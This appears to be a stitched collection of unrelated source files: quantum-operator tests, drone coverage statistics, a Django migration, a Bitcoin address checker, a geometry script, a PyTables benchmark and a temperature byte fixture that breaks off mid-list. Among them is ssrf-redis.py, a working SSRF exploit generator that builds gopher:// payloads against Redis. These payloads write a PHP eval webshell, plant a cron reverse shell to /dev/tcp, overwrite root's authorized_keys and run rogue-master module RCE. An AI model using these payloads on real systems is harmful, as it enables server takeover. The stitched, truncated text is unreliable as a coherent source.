                0.00000000 + 0.0j,
                0.12186303 - 0.12186303j,
            ],
            [
                -0.07059289 - 0.07059289j,
                0.00000000 + 0.0j,
                0.99500417 + 0.0j,
                0.00000000 + 0.0j,
            ],
            [
                0.00000000 + 0.0j,
                -0.12186303 - 0.12186303j,
                0.00000000 + 0.0j,
                0.98503746 + 0.0j,
            ],
        ],
        dtype=jnp.complex64,
    )
    assert_equal(np.allclose(sq, sqmatrix), True)
class TestDisplace:
    """A test class for the displace operator"""
    def test_displace(self):
        """Checks D(0.25) in dim 4 against a precomputed matrix, and D(0) = I."""
        dp = Displace(4)
        # Reference matrix for D(alpha = 0.25); values precomputed externally.
        dpmatrix = jnp.array(
            [
                [
                    0.96923323 + 0.0j,
                    -0.24230859 + 0.0j,
                    0.04282883 + 0.0j,
                    -0.00626025 + 0.0j,
                ],
                [
                    0.24230859 + 0.0j,
                    0.90866411 + 0.0j,
                    -0.33183303 + 0.0j,
                    0.07418172 + 0.0j,
                ],
                [
                    0.04282883 + 0.0j,
                    0.33183303 + 0.0j,
                    0.84809499 + 0.0j,
                    -0.41083747 + 0.0j,
                ],
                [
                    0.00626025 + 0.0j,
                    0.07418172 + 0.0j,
                    0.41083747 + 0.0j,
                    0.90866411 + 0.0j,
                ],
            ],
            dtype=jnp.complex64,
        )
        assert_equal(np.allclose(dp(0.25), dpmatrix), True)
        # Tests border case with 0: displacement by 0 is the identity
        for N in range(2, 50, 5):
            assert_array_almost_equal(Displace(N)(0), jnp.eye(N))
@pytest.mark.parametrize(
    "N, params, idx",
    [
        (2, [jnp.pi / 5.0, jnp.pi / 5.0], (1, 0)),  # non-zero initialization on low dim
        (3, [0.0, 0.0], (2, 0)),  # zero initialization on low dim
        (30, [0.0, 0.0], (1, 0)),  # zero initialization on high dim
        (
            40,
            [jnp.pi / 8.0, jnp.pi / 7.0],
            (20, 15),
        ),  # non-zero initialization on high dim
        (10, [0.0, 2.0 * jnp.pi], (9, 8)),  # sin is zero; cos isn't
        (5, [jnp.pi / 3.0, jnp.pi / 3.0], (3, 2)),  # both sin and cos don't vanish
        (23, [jnp.pi / 2.0, jnp.pi / 2.0], (20, 0)),  # cos vanishes; sin doesn't
        (50, [3.0 * jnp.pi, 5 * jnp.pi], (30, 20)),  # angles > 2pi
        (64, [0.0, 0.0], (63, 62)),  # checking corner indices on high dim
        (75, [2.0 * jnp.pi, 2.0 * jnp.pi], (63, 62)),
        (84, [jnp.pi, jnp.pi], (2, 0)),
        (95, [jnp.pi / 4.0, jnp.pi / 4.0], (1, 0)),
    ],
)
def test_make_rot(N, params, idx):
    """Tests the `_make_rot` method: every generated rotation must be unitary."""
    rotation = _make_rot(N, params, idx)
    # R R† = R† R = I
    assert_array_almost_equal(jnp.dot(rotation, dag(rotation)), jnp.eye(N))
    assert_array_almost_equal(jnp.dot(dag(rotation), rotation), jnp.eye(N))
class TestUnitary:
"""A test class for Unitary operators"""
@staticmethod
def generate_params(N, key=PRNGKey(0)):
"""Generator for generating parameterizing angles in `make_unitary`"""
for _ in range(3):
key, subkey = split(key)
thetas = uniform(
subkey, ((N * (N - 1) // 2),), minval=0.0, maxval=2 * jnp.pi
)
phis = uniform(subkey, ((N * (N - 1) // 2),), minval=0.0, maxval=2 * jnp.pi)
omegas = uniform(subkey, (N,), minval=0.0, maxval=2 * jnp.pi)
yield thetas, phis, omegas
def test_unitary(self):
for N in range(2, 30, 6):
for thetas, phis, omegas in TestUnitary.generate_params(N):
unitary = Unitary(N)(thetas, phis, omegas)
assert_array_almost_equal(jnp.dot(unitary, dag(unitary)), jnp.eye(N))
assert_array_almost_equal(jnp.dot(dag(unitary), unitary), jnp.eye(N))
def test_rand_ket_norm():
    """Random kets from `qgrad_rand_ket` carry unit norm."""
    for dim in range(2, 40, 6):
        norm = jnp.linalg.norm(qgrad_rand_ket(dim))
        assert_almost_equal(norm, 1.0, decimal=5)
def test_rand_ket_seed():
    """`qgrad_rand_ket` is reproducible for a fixed seed and differs across seeds."""
    for N in range(2, 30, 6):
        # test same kets for the same seed
        # BUG FIX: the original used `range(1000, 100)`, which is empty, so
        # this reproducibility check never executed a single iteration.
        for seed in range(0, 1000, 100):
            assert_array_equal(qgrad_rand_ket(N, seed), qgrad_rand_ket(N, seed))
        # test different kets for different user-provided seeds
        for (seed1, seed2) in zip(range(0, 1000, 100), range(1000, 2000, 100)):
            assert_raises(
                AssertionError,
                assert_array_equal,
                qgrad_rand_ket(N, seed1),
                qgrad_rand_ket(N, seed2),
            )
'''
def test_rand_dm():
for N in range(2, 30, 6):
# check for a valid density matrix
assert isdm(qgrad_rand_dm(N)) == True
# test same density matrices for the same seed
for seed in range(1000, 100):
assert_array_equal(qgrad_rand_dm(N, seed), qgrad_rand_dm(N, seed))
# test different density matrices for different user-given seeds
for (seed1, seed2) in zip(range(0, 1000, 100), range(1000, 2000, 100)):
assert_raises(
AssertionError,
assert_array_equal,
qgrad_rand_dm(N, seed1),
qgrad_rand_dm(N, seed2),
)
'''
@pytest.mark.parametrize(
    "oper, herm",
    [
        # check standard Hermitian matrices (the Paulis)
        (sigmax(), True),
        (sigmay(), True),
        (sigmaz(), True),
        # check random hermitian matrices
        (rand_herm(2).full(), True),
        (rand_herm(4).full(), True),
        (rand_herm(20).full(), True),
        # check non-Hermitian matrices (arange matrices are not symmetric)
        (jnp.arange(9).reshape(3, 3), False),
        (jnp.arange(16).reshape(4, 4), False),
    ],
)
def test_isherm(oper, herm):
    """`isherm` must report True exactly for the Hermitian inputs above."""
    assert isherm(oper) == herm
def test_isdm():
    """`isdm` must reject non-positive, non-Hermitian and non-unit-trace matrices."""
    # Check when matrix is non-semi-positive-definite
    non_spd = jnp.array([[1, 1], [-1, 1]])
    assert not isdm(non_spd)
    # Check standard density matrices
    assert isdm(to_dm(basis(2, 0)))
    # Check when matrix is non-hermitian.
    # BUG FIX: the original used elementwise `sigmax() * sigmay()`, which
    # equals sigmay() and is Hermitian — the matrix product X @ Y = i*Z is
    # the genuinely non-Hermitian operator this case intends to test.
    assert not isdm(jnp.dot(sigmax(), sigmay()))
    # Check when trace is non-unity
    assert not isdm(jnp.eye(2) * 2)
def test_rand_unitary():
    """Random unitaries satisfy U U† = U† U = I."""
    for dim in range(2, 43, 10):
        mat = rand_unitary(dim)
        identity = jnp.eye(dim)
        assert_array_almost_equal(jnp.dot(mat, dag(mat)), identity)
        assert_array_almost_equal(jnp.dot(dag(mat), mat), identity)
| 2.328125 | 2 |
ssrf-redis.py | kishorehariram/redis-ssrf | 59 | 12772939 | #!/usr/local/bin python
#coding=utf8
try:
from urllib import quote
except:
from urllib.parse import quote
def generate_info(passwd):
    """Return the Redis command list that fetches the INFO block.

    If `passwd` is truthy, an AUTH command is prepended.
    """
    commands = ["info", "quit"]
    if passwd:
        commands = ["AUTH {}".format(passwd)] + commands
    return commands
def generate_shell(filename, path, passwd, payload):
    """Return the Redis commands that drop `payload` into `path`/`filename`
    via an RDB save (classic webshell-write primitive).

    If `passwd` is truthy, an AUTH command is prepended.
    """
    commands = [
        "flushall",
        "set 1 {}".format(payload),
        "config set dir {}".format(path),
        "config set dbfilename {}".format(filename),
        "save",
        "quit",
    ]
    if passwd:
        commands = ["AUTH {}".format(passwd)] + commands
    return commands
def generate_reverse(filename, path, passwd, payload):  # centos
    """Return the Redis commands that write a cron reverse-shell `payload`
    into `path`/`filename` via an RDB save.

    If `passwd` is truthy, an AUTH command is prepended.
    """
    commands = [
        "flushall",
        "set 1 {}".format(payload),
        "config set dir {}".format(path),
        "config set dbfilename {}".format(filename),
        "save",
        "quit",
    ]
    if passwd:
        commands = ["AUTH {}".format(passwd)] + commands
    return commands
def generate_sshkey(filename, path, passwd, payload):
    """Return the Redis commands that write an SSH public key `payload`
    into `path`/`filename` via an RDB save.

    If `passwd` is truthy, an AUTH command is prepended.
    """
    commands = [
        "flushall",
        "set 1 {}".format(payload),
        "config set dir {}".format(path),
        "config set dbfilename {}".format(filename),
        "save",
        "quit",
    ]
    if passwd:
        commands = ["AUTH {}".format(passwd)] + commands
    return commands
def generate_rce(lhost, lport, passwd, command="cat /etc/passwd"):
    """Return the Redis commands for the rogue-master RCE chain: enslave the
    target to `lhost`:`lport`, load the dropped module and run `command`.

    If `passwd` is truthy, an AUTH command is prepended.
    """
    exp_filename = "exp.so"
    commands = [
        "SLAVEOF {} {}".format(lhost, lport),
        "CONFIG SET dir /tmp/",
        "config set dbfilename {}".format(exp_filename),
        "MODULE LOAD /tmp/{}".format(exp_filename),
        # spaces inside the command become ${IFS} so the whole command
        # survives redis_format's space-splitting as one argument
        "system.exec {}".format(command.replace(" ", "${IFS}")),
        # cleanup commands (see rce_cleanup):
        # "SLAVEOF NO ONE",
        # "CONFIG SET dbfilename dump.rdb",
        # "system.exec rm${IFS}/tmp/{}".format(exp_filename),
        # "MODULE UNLOAD system",
        "quit",
    ]
    if passwd:
        commands = ["AUTH {}".format(passwd)] + commands
    return commands
def rce_cleanup(passwd=None):
    """Return the Redis commands that undo `generate_rce`: detach from the
    rogue master, restore the dump filename, remove the dropped module file
    and unload the module.

    BUG FIXES:
    - The original referenced a global `passwd` that only exists when the
      script runs as __main__; importing this module and calling the function
      raised NameError. `passwd` is now an optional parameter (default None
      keeps the unauthenticated behavior).
    - The `${IFS}` substitution previously replaced *every* space, fusing
      "system.exec" and its argument into one RESP token; only the argument's
      spaces are escaped now, matching `generate_rce`.
    """
    exp_filename = "exp.so"
    cmd = [
        "SLAVEOF NO ONE",
        "CONFIG SET dbfilename dump.rdb",
        "system.exec {}".format("rm /tmp/{}".format(exp_filename).replace(" ", "${IFS}")),
        "MODULE UNLOAD system",
        "quit",
    ]
    if passwd:
        cmd.insert(0, "AUTH {}".format(passwd))
    return cmd
def redis_format(arr):
    """Serialize a space-separated command string into the RESP wire format:
    an array header "*<n>" followed by "$<len>" + token bulk strings."""
    CRLF = "\r\n"
    tokens = arr.split(" ")
    parts = ["*" + str(len(tokens))]
    for token in tokens:
        parts.append("$" + str(len(token)))
        parts.append(token)
    return CRLF.join(parts) + CRLF
def generate_payload(passwd, mode):
    """Build the gopher:// SSRF payload targeting the local Redis instance.

    Modes: 0 webshell drop, 1 cron reverse shell, 2 SSH key write,
    3 rogue-master RCE, 31 RCE cleanup, 4 INFO probe.

    Raises ValueError for any other mode (previously `cmd` was left
    undefined and the function crashed with a NameError). The dead initial
    `payload = "test"` assignment was removed.
    """
    if mode == 0:
        filename="shell.php"
        path="/var/www/html"
        shell="\n\n<?=eval($_GET[0]);?>\n\n"
        cmd=generate_shell(filename,path,passwd,shell)
    elif mode==1:
        filename="root"
        path="/var/spool/cron/"
        shell="\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.1.1/2333 0>&1\n\n"
        # '^' temporarily stands in for spaces so redis_format keeps the
        # crontab line as one token; restored below before URL-encoding.
        cmd=generate_reverse(filename,path,passwd,shell.replace(" ","^"))
    elif mode==2:
        filename="authorized_keys"
        path="/root/.ssh/"
        # NOTE(review): the public key body appears truncated/redacted here;
        # fill in a real key before using this mode.
        pubkey="\n\nssh-rsa "
        cmd=generate_sshkey(filename,path,passwd,pubkey.replace(" ","^"))
    elif mode==3:
        lhost="192.168.1.100"
        lport="6666"
        command="whoami"
        cmd=generate_rce(lhost,lport,passwd,command)
    elif mode==31:
        cmd=rce_cleanup()
    elif mode==4:
        cmd=generate_info(passwd)
    else:
        raise ValueError("unsupported mode: {}".format(mode))
    protocol="gopher://"
    ip="127.0.0.1"
    port="6379"
    payload=protocol+ip+":"+port+"/_"
    for x in cmd:
        # RESP-frame each command, restore '^' placeholders to spaces,
        # then URL-encode for the gopher payload.
        payload += quote(redis_format(x).replace("^"," "))
    return payload
if __name__=="__main__":
# 0 for webshell ; 1 for re shell ; 2 for ssh key ;
# 3 for redis rce ; 31 for rce clean up
# 4 for info
# suggest cleaning up when mode 3 used
mode=3
# input auth passwd or leave blank for no pw
passwd = ''
p=generate_payload(passwd,mode)
print(p)
| 2.234375 | 2 |
rover/stats.py | wallarelvo/rover | 1 | 12772940 |
import point
import math
class MonteCarloArea(object):
    """Monte-Carlo estimator of the fraction of the problem area covered by
    at least one quad's elliptical camera footprint.

    NOTE: uses `xrange`, so this module targets Python 2.
    """

    def __init__(self, problem, num_sample_points):
        # problem: supplies the rectangular domain via .width / .height
        # num_sample_points: samples drawn per update (more = lower variance)
        self.num_sample_points = num_sample_points
        self.problem = problem
        self.total_efficiency = 0.0
        self.number_of_updates = 0
        self.moving_average = 0.0
        # with learning_rate == 1.0 the "moving average" is just the latest sample
        self.learning_rate = 1.0

    def update_average_efficiency(self, quads):
        """Sample random points in the domain, count those inside any quad's
        ellipse, and fold the hit ratio into the running/moving averages.
        Returns self for chaining."""
        num_in = 0
        total = 0
        for _ in xrange(self.num_sample_points):
            r_p = point.get_random_point(
                self.problem.width, self.problem.height
            )
            for quad in quads:
                # Translate the sample into the quad's local frame...
                old_x = r_p.x - quad.x
                old_y = r_p.y - quad.y
                # ...and rotate by -beta so the ellipse is axis-aligned.
                beta_r = math.radians(quad.beta)
                X = old_x * math.cos(-beta_r) - old_y * math.sin(-beta_r)
                Y = old_y * math.cos(-beta_r) + old_x * math.sin(-beta_r)
                r_ma = quad.get_ellipse_major()
                r_mi = quad.get_ellipse_minor()
                h = quad.get_ellipse_center_dist()
                k = 0
                # Standard membership test: ((X-h)/a)^2 + ((Y-k)/b)^2 <= 1
                el_eval_x = pow(X - h, 2) / float(pow(r_ma, 2))
                el_eval_y = pow(Y - k, 2) / float(pow(r_mi, 2))
                if el_eval_x + el_eval_y <= 1:
                    num_in += 1
                    break  # point is covered; skip remaining quads
            total += 1
        self.total_efficiency += float(num_in) / total
        self.number_of_updates += 1
        self.moving_average = (1 - self.learning_rate) * self.moving_average +\
            self.learning_rate * float(num_in) / total
        return self

    def get_moving_average_efficiency(self):
        # Exponentially-weighted estimate (latest sample when learning_rate == 1)
        return self.moving_average

    def get_average_efficiency(self):
        # Plain mean of all hit ratios seen so far
        return self.total_efficiency / float(self.number_of_updates)
class SensorQualityAverage(object):
    """Exponentially-weighted average of per-quad sensor quality scores."""

    def __init__(self, planner):
        # planner must expose sq(z, phi) -> number
        self.planner = planner
        self.moving_average = 0.0
        # weight of the newest mean; 1.0 means "keep only the latest value"
        self.learning_rate = 1.0

    def update_average_sq(self, quads):
        """Fold the mean sensor quality of `quads` into the moving average.
        Returns self for chaining."""
        total = sum((self.planner.sq(q.z, q.phi) for q in quads), 0.0)
        mean_sq = total / len(quads)
        keep = 1 - self.learning_rate
        self.moving_average = keep * self.moving_average \
            + self.learning_rate * mean_sq
        return self

    def get_moving_average(self):
        """Return the current moving average."""
        return self.moving_average
class RiskAverage(object):
    """Exponentially-weighted average of per-quad risk values."""

    def __init__(self, planner):
        # planner must expose risk(x, y, z) -> number
        self.planner = planner
        self.moving_average = 0.0
        # weight of the newest mean; 1.0 means "keep only the latest value"
        self.learning_rate = 1.0

    def update_average_risk(self, quads):
        """Fold the mean risk of `quads` into the moving average.
        Returns self for chaining."""
        total = sum((self.planner.risk(q.x, q.y, q.z) for q in quads), 0.0)
        mean_risk = total / len(quads)
        keep = 1 - self.learning_rate
        self.moving_average = keep * self.moving_average \
            + self.learning_rate * mean_risk
        return self

    def get_moving_average(self):
        """Return the current moving average."""
        return self.moving_average
class AverageTimeDifference(object):
    """Mean staleness of a coverage grid: average of (current_time - cell time)
    over every cell.

    NOTE: uses `xrange`, so this module targets Python 2.
    """

    def __init__(self, grid):
        # grid: exposes .width, .height and get_raw(x, y) -> last-visit time
        self.avg = 0.0
        self.grid = grid

    def update_average_time_difference(self, current_time):
        """Recompute the mean age of all grid cells relative to `current_time`."""
        inner_sum = 0.0
        for x in xrange(self.grid.width):
            for y in xrange(self.grid.height):
                t = self.grid.get_raw(x, y)
                inner_sum += (current_time - t)
        self.avg = inner_sum / (self.grid.width * self.grid.height)

    def get_average(self):
        # Mean from the most recent update (0.0 before any update)
        return self.avg
class AverageMotionBlur(object):
    """Exponentially-weighted running average of motion-blur measurements."""

    def __init__(self):
        self.avg = 0.0
        # weight of the newest sample; 1.0 means "keep only the latest value"
        self.learning_rate = 1.0

    def update(self, val):
        """Blend `val` into the running average; returns self for chaining."""
        keep = 1 - self.learning_rate
        self.avg = keep * self.avg + self.learning_rate * val
        return self

    def get_average(self):
        """Return the current average."""
        return self.avg
| 3.09375 | 3 |
src/api/migrations/0003_auto_20220328_0004.py | IkramKhan-DevOps/cs-neuro-ai | 0 | 12772941 | <gh_stars>0
# Generated by Django 3.2.12 on 2022-03-27 19:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds the voice-measurement feature columns
    (vocal frequencies, jitter/shimmer, noise and nonlinear measures plus a
    status flag) to `Predication`, and adds help text to the `audio` field.

    NOTE(review): every measurement is an IntegerField, but jitter, shimmer
    and the nonlinear measures (RPDE, DFA, PPE, ...) are typically fractional
    values — confirm FloatField was not intended before building on this.
    """

    dependencies = [
        ('api', '0002_auto_20220327_2250'),
    ]

    operations = [
        migrations.AddField(
            model_name='predication',
            name='avg_vocal_fundamental_frequency',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='d2',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='dfa',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='hnr',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='jitter',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='max_vocal_fundamental_frequency',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='min_vocal_fundamental_frequency',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='nhr',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='ppe',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='rpde',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='shimmer',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='spread1',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='spread2',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='predication',
            name='status',
            field=models.IntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='predication',
            name='audio',
            field=models.FileField(help_text='Please record voice [15sec-45sec] voice must be .wmv format', upload_to='audios/'),
        ),
    ]
| 1.585938 | 2 |
src/btc/addr.py | ccebrecos/py-telegram-bot | 2 | 12772942 | """
https://rosettacode.org/wiki/Bitcoin/address_validation#Python
"""
# Libraries
from hashlib import sha256
# Constants
DIGITS_58 = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'


def decode_base58(addr, length):
    """Decode the base58 string `addr` into `length` big-endian bytes.

    Raises ValueError if `addr` contains a non-base58 character or the
    decoded integer does not fit in `length` bytes.
    """
    value = 0
    for ch in addr:
        value = value * 58 + DIGITS_58.index(ch)
    return value.to_bytes(length, 'big')
def check_addr(addr):
    """Validate a base58check Bitcoin address by verifying its checksum.

    The checksum is the first 4 bytes of the double-SHA256 of the 21-byte
    version+hash payload. Any decode or length error yields False.
    """
    try:
        decoded = decode_base58(addr, 25)
        payload, checksum = decoded[:-4], decoded[-4:]
        return checksum == sha256(sha256(payload).digest()).digest()[:4]
    except Exception:
        # malformed input (bad characters, wrong length) is simply invalid
        return False
| 3.3125 | 3 |
cv07/obvody_a_obsahy.py | xtompok/uvod-do-prg_20 | 3 | 12772943 | from obvody import obvod_ctverce, obvod_trojuhelnika, obvod_obdelnika, obvod_kruhu
import obsahy as o
# čtverec, obdélník, rovnostranný trojúhelník, kruh
typ = input("Zadej typ útvaru: ")
strana = int(input("Zadej délku strany / poloměr: "))
if typ == "ctverec":
obvod = obvod_ctverce(strana)
obsah = o.obsah_ctverce(strana)
elif typ == "obdelnik":
b = int(input("Zadej délku druhé strany: "))
obvod = obvod_obdelnika(strana,b)
obsah = o.obsah_obdelnika(strana,b)
elif typ == "trojuhelnik":
obvod = obvod_trojuhelnika(strana)
obsah = o.obsah_trojuhelnika(strana)
elif typ=="kruh":
obvod = obvod_kruhu(strana)
obsah = o.obsah_kruhu(strana)
else:
print("Zadal jsi neplatný tvar")
exit(1)
print(f"Obvod je {obvod} cm")
print(f"Obsah je {obsah} cm^2")
| 3.21875 | 3 |
examples/read_array_out_arg.py | scopatz/PyTables | 9 | 12772944 | # This script compares reading from an array in a loop using the
# tables.Array.read method. In the first case, read is used without supplying
# an 'out' argument, which causes a new output buffer to be pre-allocated
# with each call. In the second case, the buffer is created once, and then
# reused.
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
import numpy as np
import tables
def create_file(array_size):
    """Write a length-`array_size` int64 array of ones to test.h5 and report
    its on-disk size."""
    data = np.ones(array_size, dtype='i8')
    with tables.open_file('test.h5', 'w') as fobj:
        node = fobj.create_array('/', 'test', data)
        print('file created, size: {0} MB'.format(node.size_on_disk / 1e6))
def standard_read(array_size):
    """Time `Array.read` when a fresh output buffer is allocated per call."""
    n_iter = 10
    with tables.open_file('test.h5', 'r') as fobj:
        node = fobj.get_node('/', 'test')
        t0 = time.time()
        for _ in range(n_iter):
            output = node.read(0, array_size, 1)
        t1 = time.time()
        # sanity-check the data actually read back correctly
        assert np.all(output == 1)
        print('standard read \t {0:5.5f}'.format((t1 - t0) / n_iter))
def pre_allocated_read(array_size):
    """Time `Array.read` when one output buffer is allocated up front and
    reused via the `out` argument."""
    n_iter = 10
    with tables.open_file('test.h5', 'r') as fobj:
        node = fobj.get_node('/', 'test')
        t0 = time.time()
        output = np.empty(array_size, 'i8')
        for _ in range(n_iter):
            node.read(0, array_size, 1, out=output)
        t1 = time.time()
        # sanity-check the data actually read back correctly
        assert np.all(output == 1)
        print('pre-allocated read\t {0:5.5f}'.format((t1 - t0) / n_iter))
if __name__ == '__main__':
    # Benchmark both read styles over array sizes from 0.1 MB to 100 MB.
    array_num_bytes = [int(x) for x in [1e5, 1e6, 1e7, 1e8]]
    for array_bytes in array_num_bytes:
        array_size = int(array_bytes // 8)  # 8 bytes per int64 element
        create_file(array_size)
        standard_read(array_size)
        pre_allocated_read(array_size)
        print()
| 2.75 | 3 |
tlr/fixtures/temperature1.py | bpptkg/tlr | 0 | 12772945 | <filename>tlr/fixtures/temperature1.py
raw_data = [
b'\x1cT#01 61.01,\r\nT#03 88.07,90.78,90.17,29.48,14.41\r\n \r\n \xae$\xe2\x02\xe0D\x143P\x02\xe0',
b'T#01 56.92,\r\nT#03 88.10,90.62,90.42,29.68,14.39\r\n \r\n C \xfc',
b'T#01 63.51,\r\nT#03 87.98,90.36,90.15,29.30,14.41\r\n \r\n \x03\x82\x01\x80$\x9f\xd8\xbc\x0f\x08',
b'T#01 56.05,\r\nT#03 87.99,90.66,90.52,29.00,14.40\r\n \r\n \x080"',
b'T#01 59.20,\r\nT#03 88.17,91.09,90.62,28.79,14.41\r\n \r\n \x803\x06\x18\xf8',
b'T#01 52.21,\r\nT#03 87.93,90.57,90.56,28.65,14.40\r\n \r\n \xf83\x0b\x1c',
b'T#01 49.17,\r\nT#03 87.75,90.50,90.40,28.24,14.41\r\n \r\n :\x02@\x8c\x06',
b'T#01 45.93,\r\nT#03 87.86,91.08,90.75,27.81,14.42\r\n \r\n \x01\x80\xa1s\x86\xe7\x03\xfc',
b'T#01 50.86,\r\nT#03 87.79,90.61,90.53,27.23,14.43\r\n \r\n \x86\x16 \x80\xf0\xc7\xf2\xc0',
b'\x1e\x80\xf8T#01 47.12,\r\nT#03 87.54,90.59,90.41,26.66,14.42\r\n \r\n \xf1\x17a\x80\x02\xfe',
b'T#01 50.26,\r\nT#03 87.60,90.97,90.42,26.95,14.40\r\n \r\n \xc0\xf3[\xd3\x81\xfc9\xf5\xb8\x06\x80\xfe',
b'T#01 57.21,\r\nT#03 87.64,90.55,90.13,25.40,14.42\r\n \r\n \x04\x08\x93\x98\xd9\xfc',
b'T#01 54.55,\r\nT#03 87.86,90.88,90.43,25.55,14.40\r\n \r\n \x01\x80\t\x18\xc6!`\xfe',
b'#01 53.39,\r\nT#03 87.89,90.84,90.12,25.71,14.41\r\n \r\n \x01(\x12 \xfe',
b'T#01 52.59,\r\nT#03 88.06,90.75,90.29,26.29,14.40\r\n \r\n \xf2\x83l\x1e<\x90\x04',
b'\xfeT#01 54.47,\r\nT#03 87.93,90.83,90.04,26.48,14.41\r\n \r\n k|^y\xfe',
b'T#01 55.85,\r\nT#03 87.83,90.89,90.51,26.45,14.42\r\n \r\n \xc4\xd6>4\xfa',
b'T#01 52.55,\r\nT#03 87.59,90.84,90.53,25.37,14.42\r\n \r\n \x02:\\@\x84G\x01\x84',
b'T#01 54.72,\r\nT#03 87.76,90.86,90.25,25.36,14.40\r\n \r\n \x90\x80B\xc8;\x80\x0e\x80',
b'T#01 54.70,\r\nT#03 87.78,90.64,90.08,25.54,14.40\r\n \r\n \x88P\xc2\x06',
b'T#01 55.10,\r\nT#03 87.96,90.90,90.54,26.46,14.41\r\n \r\n @\xf0kT\xfc',
b'T#01 53.83,\r\nT#03 87.90,90.91,90.32,25.77,14.42\r\n \r\n \x12\x0e"\xf2 \xbb\x0f\x80',
b'T#01 54.64,\r\nT#03 87.99,90.50,90.26,26.15,14.43\r\n \r\n ',
b'T#01 53.13,\r\nT#03 87.85,91.07,90.40,25.94,14.43\r\n \r\n \x80\xf8',
b'T#01 60.26,\r\nT#03 87.62,91.09,90.31,25.16,14.42\r\n \r\n \x18A\x04',
b'T#01 56.29,\r\nT#03 87.71,91.03,90.17,24.70,14.40\r\n \r\n "\xc8H\xc0',
b'T#01 66.20,\r\nT#03 87.77,91.03,90.26,24.44,14.40\r\n \r\n ',
b'T#01 57.08,\r\nT#03 87.82,91.13,90.22,24.22,14.40\r\n \r\n \x01\x02\x80@\x04',
b'T#01 61.81,\r\nT#03 87.69,91.07,90.28,24.03,14.40\r\n \r\n \xf3',
b'T#01 59.01,\r\nT#03 87.73,90.70,90.07,23.99,14.42\r\n \r\n @\xfc',
b'T#01 56.05,\r\nT#03 87.69,91.02,90.36,24.32,14.40\r\n \r\n \xa0\x8f\x0b\x07\x01',
b'T#01 63.64,\r\nT#03 87.72,90.99,90.34,24.45,14.41\r\nT#01 64.58,\r\n \r\n \xfe',
b'\xfcT#01 67.45,\r\nT#03 87.80,90.83,90.22,24.52,14.42\r\n \r\n \x02\x04\xfe ,@\xa3\x03',
b'T#01 60.04,\r\nT#03 87.69,90.80,90.57,24.98,14.41\r\n \r\n \xe0\x01\x14',
b'T#01 59.57,\r\nT#03 87.72,90.96,90.57,25.91,14.42\r\n \r\n \x01\xe4s\xe10D\x03\xe0',
b'T#01 61.67,\r\nT#03 87.73,91.05,90.40,26.04,14.42\r\n \r\n \xe0\xfa\xe2\xc8\x84\x1e',
b'\x12\xf8T#01 85.78,\r\nT#03 87.71,91.21,90.41,25.67,14.39\r\n \r\n 2\x011\x95\x89\x80\r\xf0',
b'T#01 69.74,\r\nT#03 87.91,90.97,90.49,25.24,14.42\r\n \r\n \xf0',
b'T#01 65.01,\r\nT#03 87.93,90.61,90.60,25.28,14.41\r\n \r\n \x01\xf3HB',
b'T#01 63.63,\r\nT#03 87.97,90.90,90.92,26.12,14.40\r\n \r\n \xfe',
b'T#01 61.84,\r\nT#03 88.17,91.13,90.78,26.92,14.42\r\n \r\n \x80H\xf0',
b'T#01 65.72,\r\nT#03 87.72,90.93,90.51,26.14,14.40\r\n \r\n \xfe1\x8e',
b'T#01 61.01,\r\nT#03 87.61,90.94,90.65,25.93,14.40\r\n \r\n \x02\x1cH\xe0',
b'T#01 60.10,\r\nT#03 87.62,90.97,90.60,25.87,14.39\r\n \r\n \xf1',
b'T#01 61.83,\r\nT#03 87.83,91.03,90.29,25.60,14.43\r\n \r\n \xf8\xe8',
b'T#01 65.53,\r\nT#03 88.13,90.71,90.49,25.44,14.42\r\n \r\n \xc7a"\x12\x04',
b'T#01 67.88,\r\nT#03 87.83,91.02,90.20,25.28,14.42\r\n \r\n 0\x07@\x12D',
b'T#01 77.61,\r\nT#03 87.68,91.06,90.27,24.85,14.42\r\n \r\n \x800\xfb\x02\xdc\x03\x01\x1e',
b'T#01 67.28,\r\nT#03 87.94,91.08,90.61,24.95,14.40\r\n \r\n \xc0|\xdb\xe8g<',
b'T#01 63.90,\r\nT#03 87.86,90.98,90.53,24.97,14.43\r\n \r\n \xc7\x02\x80',
b'T#01 60.11,\r\nT#03 87.76,90.91,90.52,25.06,14.40\r\n \r\n ',
b'T#01 66.12,\r\nT#03 87.65,90.85,90.69,25.25,14.42\r\n \r\n \xe0\x02\x80X\t\x04@',
b'T#01 71.97,\r\nT#03 87.81,90.91,90.32,25.65,14.42\r\n \r\n \xc8\x06\x047',
b'T#01 66.58,\r\nT#03 87.79,91.06,90.35,25.46,14.43\r\n \r\n `\x80\x88\xa4\xfc',
b'T#01 58.96,\r\nT#03 87.32,90.92,90.27,25.17,14.39\r\n \r\n \x08\xfa',
b'T#01 58.30,\r\nT#03 87.23,90.91,90.43,24.80,14.41\r\n \r\n ',
b'T#01 56.55,\r\nT#03 87.35,90.98,90.50,24.71,14.39\r\n \r\n \xf8<-\x0c',
b'T#01 58.05,\r\nT#03 87.40,90.91,90.18,24.76,14.41\r\n \r\n \x05',
b'T#01 76.65,\r\nT#03 87.64,91.03,90.22,24.38,14.42\r\n \r\n `\x81\xc2\xc0#\x0c\x1c',
b'T#01 65.58,\r\nT#03 87.69,90.56,90.21,24.26,14.40\r\n \r\n \xc8',
